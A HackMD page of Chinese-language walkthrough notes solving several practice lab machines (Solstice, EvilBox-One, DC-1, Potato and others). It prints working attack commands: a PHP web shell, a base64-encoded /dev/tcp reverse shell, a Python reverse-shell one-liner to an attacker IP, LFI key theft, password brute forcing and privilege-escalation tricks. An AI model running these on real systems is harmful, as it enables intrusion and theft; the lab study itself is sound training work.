HackMD
Solstice
┌──(root㉿G)-[/home/kali]
└─# nmap -sS -Pn 192.168.178.72 -p- -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:27 CST
Warning: 192.168.178.72 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.178.72
Host is up (0.078s latency).
Not shown: 64952 closed tcp ports (reset), 574 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
2121/tcp open ccproxy-ftp
3128/tcp open squid-http
8593/tcp open unknown
54787/tcp open unknown
62524/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 428.63 seconds
有許多未知服務做更進階的端口識別
┌──(root㉿G)-[/home/kali]
└─# nmap -sS -Pn 192.168.178.72 -p21,22,25,80,2121,3128,8593,54787,62524 -T5 -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 20:44 CST
Nmap scan report for 192.168.178.72
Host is up (0.080s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.178.72:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
| 256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_ 256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp open smtp Exim smtpd 4.92
| smtp-commands: solstice Hello nmap.scanme.org [192.168.45.199], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
2121/tcp open ftp pyftpdlib 1.5.6
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.178.72:2121
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------ 2 www-data www-data 4096 Jun 18 2020 pub
3128/tcp open http-proxy Squid http proxy 4.6
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.6
8593/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
54787/tcp open http PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
62524/tcp open ftp FreeFloat ftpd 1.00
Service Info: Host: solstice; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds
在 80 端口的網站沒啥可以打得,在 8593 的網站可以利用 LFI 2 RCE
在嘗試的過程中var/log/apache2/access.log可以被讀取,透過修改封包注入 php code <?php echo system($_GET['cmd'];?>
靶機問題…
Inclusiveness
21,22,80 port open ,並且 ftp 可以 Anonymous 登入
┌──(root㉿G)-[/tmp]
└─# nmap -sS -Pn -sC 192.168.243.14 --top-ports=15 -T5 -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-16 20:58 CST
Nmap scan report for 192.168.243.14
Host is up (0.078s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.154
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA)
| 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA)
|_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519)
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
110/tcp closed pop3
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp closed microsoft-ds
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
8080/tcp closed http-proxy
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
但是登入後甚麼檔案都沒有,只有一個資料夾,但是可以發現這裡允許我們上傳檔案
┌──(kali㉿G)-[/tmp]
└─$ ftp Anonymous@192.168.243.14
Connected to 192.168.243.14.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||13394|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Feb 08 2020 .
drwxr-xr-x 3 0 0 4096 Feb 08 2020 ..
drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||17063|)
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Feb 08 2020 .
drwxr-xr-x 3 0 0 4096 Feb 08 2020 ..
226 Directory send OK.
ftp>
在網頁的部分找到目錄/manual
似乎沒有甚麼其他好利用的,去看/robots.txt,網站顯示You are not a search engine! You can't read my robots.txt! ,換個方式訪問可以看到我們的目標目錄
┌──(kali㉿G)-[/tmp]
└─$ curl http://192.168.243.14/robots.txt --user-agent GoogleBot
User-agent: *
Disallow: /secret_information/
可以看到網站透過更改?lang=可以成功LFI
直接上傳 php-reverse-shell.php 透過讀取 /var/ftp/pub/php-reverse-shell.php 來RCE
提權的部分可以看到有兩個奇怪的檔案
-rwsr-xr-x 1 root root 16976 Feb 8 2020 rootshell
-rw-r--r-- 1 tom tom 448 Feb 8 2020 rootshell.c
www-data@inclusiveness:/home/tom$ cat rootshell.c
cat rootshell.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
int main() {
printf("checking if you are tom...\n");
FILE* f = popen("whoami", "r");
char user[80];
fgets(user, 80, f);
printf("you are: %s\n", user);
//printf("your euid is: %i\n", geteuid());
if (strncmp(user, "tom", 3) == 0) {
printf("access granted.\n");
setuid(geteuid());
execlp("sh", "sh", (char *) 0);
}
}
www-data@inclusiveness:/home/tom$
可以透過更改環境變數把whoami隨意改成我們所想要的
www-data@inclusiveness:/home/tom$ echo 'echo tom' > whoami
echo 'echo tom' > whoami
bash: whoami: Permission denied
www-data@inclusiveness:/home/tom$ cd /tmp
cd /tmp
www-data@inclusiveness:/tmp$ echo "echo tom" > whoami
echo "echo tom" > whoami
www-data@inclusiveness:/tmp$ chmod +x whoami
chmod +x whoami
www-data@inclusiveness:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@inclusiveness:/tmp$ /home/tom/rootshell
/home/tom/rootshell
checking if you are tom...
you are: tom
access granted.
# cat /root/proof.txt
cat /root/proof.txt
8d3f0387251383abb846c12482691bbb
# ^C
EvilBox-One
22,80 port open 這台很考驗 fuzzing 技巧,網站打開是 Apache2 Debian Default Page 先是找到/secret目錄後,在 fuzzing 出 evil.php
┌──(kali㉿G)-[/tmp]
└─$ gobuster dir -u http://192.168.155.212/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.155.212/secret
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,aspx,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 4]
/.php (Status: 403) [Size: 280]
/evil.php (Status: 200) [Size: 0]
Progress: 55845 / 882244 (6.33%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 55875 / 882244 (6.33%)
===============================================================
Finished
===============================================================
但是網頁還是一樣白的一頁
繼續 fuzzing 找到是command參數
┌──(kali㉿G)-[~]
└─$ ffuf -u http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirb/big.txt -fw 1
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.155.212/secret/evil.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 1
________________________________________________
command [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 76ms]
:: Progress: [20469/20469] :: Job [1/1] :: 536 req/sec :: Duration: [0:00:47] :: Errors: 0 ::
透過讀取/etc/passwd得知 user mowree,在去嘗試讀取/home/mowree/.ssh/id_rsa
┌──(kali㉿G)-[~]
└─$ curl http://192.168.155.212/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
在嘗試用id_rsa直接登入時發現不行,需要 passphrase
┌──(kali㉿G)-[/tmp]
└─$ ssh mowree@192.168.155.212 -i id_rsa
The authenticity of host '192.168.155.212 (192.168.155.212)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.155.212' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
用ssh2john爆出密碼unicorn
┌──(kali㉿G)-[/tmp]
└─$ ssh2john id_rsa > hash
┌──(kali㉿G)-[/tmp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2024-09-15 17:55) 33.33g/s 42666p/s 42666c/s 42666C/s ramona..poohbear1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
提權的部分,發現我們有權限寫入/etc/passwd,直接重新給 root password
mowree@EvilBoxOne:~$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
mowree@EvilBoxOne:~$ openssl passwd root
9kQPB8avNoXCg
naon /etc/passwd 進去改成 root:9kQPB8avNoXCg:0:0:root:/root:/bin/bash ,之後直接 su root 輸入密碼 root 就拿到 root 了
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# cat /root/proof.txt
e4d485eacaf6c6d29c6fabec6c6f4968
root@EvilBoxOne:/home/mowree# exit
mowree@EvilBoxOne:~$ cerrar sesión
Connection to 192.168.155.212 closed.
Monitoring
22,25,80,443 port open ,網頁打開後是一個 nagios xi 的頁面,查了一下 default username 得到 nagiosadmin ,password 嘗試弱密碼 admin 登入成功
可以發現它的版本5.6.0 有一個 RCE 漏洞可以打,而且打進去就是 root 的權限
┌──(kali㉿G)-[/tmp]
└─$ php 47299 --host=192.168.171.136 --ssl=false --user=nagiosadmin --pass=admin --reverseip=192.168.45.191 --reverseport=4444
[+] Grabbing NSP from: http://192.168.171.136/nagiosxi/login.php
[+] Retrieved page contents from: http://192.168.171.136/nagiosxi/login.php
[+] Extracted NSP - value: cb269f55b1f8dd0d6fc3b4c6abfff7ac92037953dd514a37790a1366cf7eec12
[+] Attempting to login...
[+] Authentication success
[+] Checking we have admin rights...
[+] Admin access confirmed
[+] Grabbing NSP from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php
[+] Retrieved page contents from: http://192.168.171.136/nagiosxi/admin/monitoringplugins.php
[+] Extracted NSP - value: e67bb311cc6c45ea6faf1a151d04567485e3a1812c3e4d85118276e427d71300
[+] Uploading payload...
[+] Payload uploaded
[+] Triggering payload: if successful, a reverse shell will spawn at 192.168.45.191:4444
┌──(kali㉿G)-[/tmp]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.171.136] 44100
bash: cannot set terminal process group (954): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cat /root/proof.txt
<osxi/html/includes/components/profile# cat /root/proof.txt 0b1ad11445f29d8979aeea8a165c0da2
DC-1
先掃port , ssh http rpc service open,在打開網頁發現是 drupal 沒辦法去 CHANGLOG.txt 查看版本,只好嘗試錯誤嘗試法,在XX考試剛好有遇到 drupal RCE,在用一樣的exploit,打一次
┌──(kali㉿G)-[/tmp]
└─$ python3 exploit.py http://192.168.157.193/ -c "echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash"
============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |
| by pimps |
=============================================================================
[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-LMI8DwNIM7HoyAgcZyNaC7Nxt_a4-8CoiOScL1TnwbI
[*] Triggering exploit to execute: echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNjgvNDQ0NCAwPiYx | base64 -d | bash
之後local.txt 就拿到了
再利用簡單的SUID提權利用find 開啟一個root shell
┌──(kali㉿G)-[/tmp]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.171.118 mysql
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-13 22:17:29
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.171.118:3306/
[STATUS] 344.00 tries/min, 344 tries in 00:01h, 14344055 to do in 694:58h, 4 active
[STATUS] 335.33 tries/min, 1006 tries in 00:03h, 14343393 to do in 712:54h, 4 active
[STATUS] 338.71 tries/min, 2371 tries in 00:07h, 14342028 to do in 705:43h, 4 active
[STATUS] 340.07 tries/min, 5101 tries in 00:15h, 14339298 to do in 702:47h, 4 active
[3306][mysql] host: 192.168.171.118 login: root password: prettywoman
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-13 22:47:15
找到login: root password: prettywoman
登入mysql後找到表格內容
┌──(kali㉿G)-[/tmp]
└─$ mysql -u root -h 192.168.171.118 -p --skip-ssl
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 7285
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| data |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.081 sec)
MariaDB [(none)]> use data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| fernet |
+----------------+
1 row in set (0.080 sec)
MariaDB [data]> select * from fernet;
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred | keyy |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
1 row in set (0.083 sec)
MariaDB [data]>
研究了陣子發現Fernet 是一種對稱加密演算法,用online tool解出來
lucy:wJ9"Lemdv9\[FEw-
ssh 進去後local 就拿到了
┌──(kali㉿G)-[~/Downloads]
└─$ ssh lucy@192.168.171.118 -p 1337
The authenticity of host '[192.168.171.118]:1337 ([192.168.171.118]:1337)' can't be established.
ED25519 key fingerprint is SHA256:K18aoM62L+/GHVzkZJScoh+S91IW1EPPvsc1K7UuVbE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.171.118]:1337' (ED25519) to the list of known hosts.
lucy@192.168.171.118's password:
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lucy@pyexp:~$ cat local.txt
.bash_history .bash_logout .bashrc local.txt .profile user.txt
lucy@pyexp:~$ cat local.txt
879a9259b86d302aea312c4cdffc3929
lucy@pyexp:~$
提權的部分比較簡單
sudo -l可以看到 (root) NOPASSWD: /usr/bin/python2 /opt/exp.py
把/opt/exp.py cat 出來很明顯的使用危險函數exec,利用這點
lucy@pyexp:~$ sudo -l
Matching Defaults entries for lucy on pyexp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lucy may run the following commands on pyexp:
(root) NOPASSWD: /usr/bin/python2 /opt/exp.py
lucy@pyexp:~$ cat /opt/exp.py
uinput = raw_input('how are you?')
exec(uinput)
lucy@pyexp:~$ sudo /usr/bin/python2 /opt/exp.py
how are you?__import__('os').system('/bin/bash')
root@pyexp:/home/lucy# cat /root/proof.txt
a7cafa73b9d0bc4db658cc924bd33167
root@pyexp:/home/lucy#
SunsetDecoy
port scan result 22 80 port open
網頁打開後是有一個zip檔,下載下來發現zip 上鎖,用zip2john在用john 爆出密碼manuel,unzip後裡面有passwd shadow 等等。
┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc]
└─$ ll
total 24
-rw-r--r-- 1 kali kali 829 Jun 28 2020 group
-rw-r--r-- 1 kali kali 33 Jun 28 2020 hostname
-rw-r--r-- 1 kali kali 185 Jun 28 2020 hosts
-rw-r--r-- 1 kali kali 1807 Jun 28 2020 passwd
-rw-r----- 1 kali kali 1111 Jul 8 2020 shadow
-r--r----- 1 kali kali 669 Feb 2 2020 sudoers
┌──(kali㉿LAPTOP-FKRJU4AD)-[/tmp/etc]
└─$ unshadow passwd shadow > hash
用unshadow加上john,爆出user:296640a3b825115a47b68fc44501c828 ,password:server ,ssh成功登入
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -al
total 56
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Aug 21 10:41 .
drwxr-xr-x 3 root root 4096 Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 220 Jun 27 2020 .bash_logout
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3583 Jun 27 2020 .bashrc
-rwxr-xr-x 1 root root 17480 Jul 7 2020 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 2020 honeypot.decoy.cpp
lrwxrwxrwx 1 root root 7 Jun 27 2020 id -> /bin/id
lrwxrwxrwx 1 root root 13 Jun 27 2020 ifconfig -> /bin/ifconfig
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Aug 21 09:57 local.txt
lrwxrwxrwx 1 root root 7 Jun 27 2020 ls -> /bin/ls
lrwxrwxrwx 1 root root 10 Jun 27 2020 mkdir -> /bin/mkdir
-rwxr-xr-x 1 root root 807 Jun 27 2020 .profile
-rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 66 Jun 27 2020 .selected_editor
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 32 Aug 27 2020 user.txt
這是一個非常受限制的shell 在考RESTRICTED SHELL ESCAPING吧,執行了下honeypot.decoy,其中輸入7會開一個vim
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:7
這裡查了一下 VIM Editor Commands 找到:r local.txt成功拿到local.txt
之後問chat GPT大哥得知,可以幾種方式逃脫限制
使用相對路徑或只使用命令名稱
ssh user@ip -t sh
執行非互動式命令
ssh user@ip 'sh -c "你的命令"'
嘗試啟動其他不受限制的 shell
ssh user@ip -t bash
透過 RBASH 逃脫
ssh user@ip -t "bash --noprofile"
這邊用-t sh可以不受限制,但是有看到更好的解法在受限制的環境加上路徑的環境變數即可解決。
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
e04 root 還是敲不出來擱著
OnSystemShellDredd
先掃最常見的20個ports,只有開21 port,並且可以用Anonymous登入
用ftp連進去後ls沒有任何東西翻了一下才發現檔案是.開頭的
之後把id_rsa下載下來,由於目前的port scan 沒有任何服務是ssh的於是用-p-掃描全部端口
SSH連進去user 的flag就拿到了
嘗試過幾種方法最後用找suid的方式再搭配gtfobins找到mawk可以利用
最後拿到root flag
Shakabrah
這次不做port scan 根據經驗22 80 會開懶得掃了,網頁打開就是告訴我要command injection,拿到user flag
之後大概花了一小時再用reverse shell還是沒結果,偷看了一下人家成功的reverse shell payload
; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.208",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
在本地端收到後先拿到完整可使用的shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
用find / -perm -u=s 2>/dev/null結果發現vim 可以用,直接vim /root/proof.txt拿到root flag,這裡的vim 非常有病經過一坡三折後才再奇怪的畫面看到
InfosecPrep
port scan result 22 80 port open
用nmap nse 掃有發現robots.txt裡面disallow /secret去那看發現是一大坨base64 拿去decode後是openssh儲存成id_rsa,chmod 600連進去後就拿到user flag
後來花了2 3個小時看suid提權把所有方法是過一次,再去挖uname -r發現有一個剛好也是所需要的提權CEV因為那裡沒有gcc在本機編譯完再開web server結果把機的環境不支援,執行出現錯誤,在試過 github各種exploit都打不了,真的研究超久後,偷看人家怎麼打的才發現原來bash -p可以提權成功
Potato
先掃常見的ports
80 port有開就先去打web,網頁只有一顆potato
用dirb先枚舉uri找到/admin
sql injected 不了繼續掃,在/admin/logs/找到user有admin
沒想法了,做一次全面的port scan ,找到2112 port 開著,在對該端口詳細調查得知是ftp並解可以用anonymous登入
cat index.php.bak得到網站code
<?php
$pass= "potato"; //note Change this password regularly
if($_GET['login']==="1"){
if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) {
echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
setcookie('pass', $pass, time() + 365*24*3600);
}else{
echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
}
exit();
}
?>
結果用admin/potato登入不了…
查了一下php bypass strcmp參考這篇
登入成功後,找到logs這裡用burpsuite似乎可以command injection
操作幾個注入方式拿到user flag
之後cat /etc/passwd得到webadmin的password hash
拿下來用john,後來我的john不省人事,用hashcat 找到密碼dragon
之後sudo -l來查看有啥可以用,有這個鬼可以用 /bin/nice /notes/*,把這個硬拉去扯/bin/shOK get root
FunboxEasy
port scan result
拿去dirb 找到/store/ 網站打開就是一個可以RCE的書店,別問為啥知道(之前打過
去exploit db找這個payload就可以打進去了,s拿到user flag 後順便收集了ssh 進去的密碼
最後sudo -l嘗試第一個失敗後根據經驗在挑一個試,最後get root
Moneybox
這題該怎麼說就很CTF有打過類似的
port scan result
21 22 80 port open
ftp 可以用Anonymous進去後就一張圖片拿去
steghide extract -sf trytofind.jpg
需要密碼,用dirb掃到/blog之後就一路f12(反正就是有手就會那種,之後就拿到key,提取出來後有data.txt如下
因為它提到人名renu也說password too week 也沒其他好打了用hydra 爆破吧,登入後翻了一下,也嘗試過all sorts of提權方式,沒找到有啥可以利用的,之後找到有authorized_keys不知道它是幹嘛的問chat gpt得知
